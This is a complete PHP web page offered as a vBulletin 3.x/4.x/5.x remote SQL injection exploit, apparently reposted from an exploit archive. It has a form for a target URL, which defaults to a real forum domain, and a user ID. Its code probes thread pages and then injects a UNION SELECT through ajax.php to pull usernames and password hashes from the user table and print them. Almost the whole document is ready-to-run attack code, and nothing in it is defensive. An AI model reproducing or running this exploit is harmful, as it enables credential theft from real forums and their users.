Remote SQL Injection PHP exploit-vBulletin

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body {background-color: black; font-family: Verdana;  font-size: 10pt; color: #d9d9d9; margin: 30px; 30px; auto; background-attachment: fixed; background-image: url('https://lh6.googleusercontent.com/-C-Zv0fYrOtU/UJgYzWMMUiI/AAo/3UyiI7kIcQo/s600/back4.jpg'); background-repeat: no-repeat; background-position: right bottom;}
div  { margin: 30px; 30px; auto; }

</style>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title> vBulletin 3.x / 4.x  / 5.x remote SQL Injection PHP exploit [b][y] Cold z3ro </title>
</head>
<body>

<form method="post"/>
<table width="100%" border="0">
<tr>
<td>target</td>
<td><input type="text" value="<? if($_POST[host]) {echo $_POST[host]; }else{echo 'http://forum.dnevno.hr/';} ?>" name="host" size="70" />
</td>
</tr>
<tr>
<td>userid</td>
<td><input type="text" value="<? if($_POST[uid]) {echo $_POST[uid]; }else{echo '1';} ?>" name="uid" size="6" /><input type="submit" name="exp" value="Exploit-it"/></td>
</tr>
</table>
</form>

<div>

<?php

/**
* @exploit  vBulletin 3.x/4.x/5.x ( quick_replay ) remote SQL Injection PHP exploit
* @author  Cold z3ro
* @site  http://www.hackteach.org , http://www.s3curi7y.com
* @copyright   26-12-2012
* @about it    Its depends on ajax.php file, and comments quick replay via ajax file if anabled.
* @Note  This exploit coded for english language vBulletin forums,
* @Note.  non english exploit will faild,you need to exploit it manually
* @Note.  or to edit some variables depends on the fourm main language.
* @Note.  Exploit takes time while executing.
* @type  0day, danger
**/

set_time_limit(0);
ini_set('user_agent', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)');

function fetchinj( $string, $str, $end ){
$string = " ".$string;
$ini = strpos( $string,$str );
if ($ini == 0) return "";
$ini += strlen( $str );
$len = strpos( $string,$end,$ini ) - $ini;
return substr( $string,$ini,$len );
}

function pagethis( $surl ){
$ch = curl_init();
curl_setopt ( $ch, CURLOPT_URL, $surl );
curl_setopt ( $ch, CURLOPT_HEADER, 0 );
ob_start();
curl_exec ( $ch );
curl_close ( $ch );
$data = ob_get_contents();
ob_end_clean();
return $data;
}

if ($_POST['exp']){
$host = $_POST['host'];
$uid = $_POST['uid'];

if( !eregi('http://', $host)){
die('use "http://" in the link you moron');
}else{

$back = substr($host,-1,1);
if ($back !="/"){
$lnk = "/ajax.php";
}else{
$lnk = "ajax.php";
}

$lnk.= '?do=';
$lnk.= 'quick_replay';
$lnk.= "&t=";

# checking site requirement
$link2check   = pagethis( $host.'showthread.php?t=210' );
$_link2check  = pagethis( $host.'showthread.php?t=400' );
$check1 = strstr( $link2check, 'You are not logged' );
$check2 = strstr( $link2check, 'If you followed a valid link' );
$check3 = strstr( $_link2check, 'If you followed a valid link' );

if( $check1 == true ){
die('Exploit Faild: target need login authentication');
}else if( $check2 == true and $check3 == true ){

# make the exploit exactly and much better
# looking for 25 $_GET[t];
for( $i=5; $i<30; $i++ ){
$multicheck = pagethis( $host.'showthread.php?t='.$i.'' );
$what2check = strstr( $multicheck, 'vBulletin Message' );
$found  = array( $what2check );
foreach ( $found as $value => $val ){
if ( !$val[0] )
break 2;
}

}

}

# Injecton SQL.
$exp = '+union+select+1,2,3,';
$exp.= 'concat(0x7a33726f31,username,0x0d0a,password,0x7a33726f32)';
$exp.= ',5,6,username,8,9,10,11,12,13,14,15,16,17';
$exp.= '+from+user+where+';
$exp.= 'userid='.$uid.'--';

if ( $i ){
$exp = $host.$lnk.$i.$exp;
}else{
$exp = $host.$lnk.'32'.$exp;
}

$extinj = pagethis( $exp );
$result = fetchinj( $extinj, 'z3ro1', 'z3ro2' );
//print_r($result);

if ( $result[1] ){
echo 'Exploit fineshed :<br><br>'.$result;
}else{
echo 'Exploit Faild';
}
}
}

# Eof

?>
</div>

</body>
</html>

# 1337day.com [2012-11-29]